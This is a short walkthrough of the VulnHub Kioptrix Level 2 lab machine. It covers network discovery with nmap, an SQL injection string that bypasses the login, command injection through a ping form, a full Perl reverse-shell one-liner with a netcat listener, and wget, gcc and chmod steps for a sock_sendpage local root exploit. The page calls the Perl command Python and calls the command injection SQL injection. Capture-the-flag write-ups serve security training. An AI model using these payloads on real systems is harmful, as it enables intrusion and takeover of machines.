Kioptrix Level 2 (VulnHub): Complete Walkthrough and Guide

Here is a complete walkthrough and tutorial on how to hack and penetrate Kioptrix Level 2 (Kioptrix: Level 1.1) of VulnHub.


Kioptrix Level 2 Description:

Kioptrix Level 2 (or Kioptrix: Level 1.1) is a part of the Kioptrix vulnerable machine series. The objective is to acquire root access using techniques in vulnerability assessment and exploitation.

Author: Kioptrix

Download: VulnHub

Kioptrix Level 2 Walkthrough

Kioptrix Level 2 was found by conducting an Nmap ping sweep and using the arp command.

nmap -sP

arp -a


Doing a quick Nmap scan, it was found that Kioptrix Level 2 port 80 was open – so it was accessed using a web browser.

nmap -n


Browsing to http:// showed that Kioptrix Level 2 was hosting a Remote System Administration Login website with a username and password form.


The Remote System Administration Login webpage was been tested for SQL injection attacks and it was found out that using 1′ or ‘1’ = ‘1 as the username and password will let you bypass the login credentials and access the Basic Administrative Web Console which lets you ping a machine on the network.


The ping form was then tested for SQL injection vulnerabilities which found that a simple semi-colon (;) will allow the attacker to inject commands.

A Netcat listener was opened which waits for incoming connections while a reverse shell Python command was then used on the Ping form to obtain a low privilege shell.

nc -nlvp 443

Command used on the Ping form:

;perl -e 'use Socket;$i="";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'




The low privilege shell was used to enumerate Kioptrix Level 2 which found that it is vulnerable to 2.4/2.6 sock_sendpage() local root exploit which can be found on Exploit Database.

The exploit was then downloaded on Kioptrix Level 2 and was executed which resulted on gaining a root shell.

wget -O /tmp/linux-sendpage.c --no-check-certificate

gcc -Wall -o linux-sendpage linux-sendpage.c

chmod 777 linux-sendpage





Kioptrix Level 2 has been successfully hacked and exploited!

Leave a Reply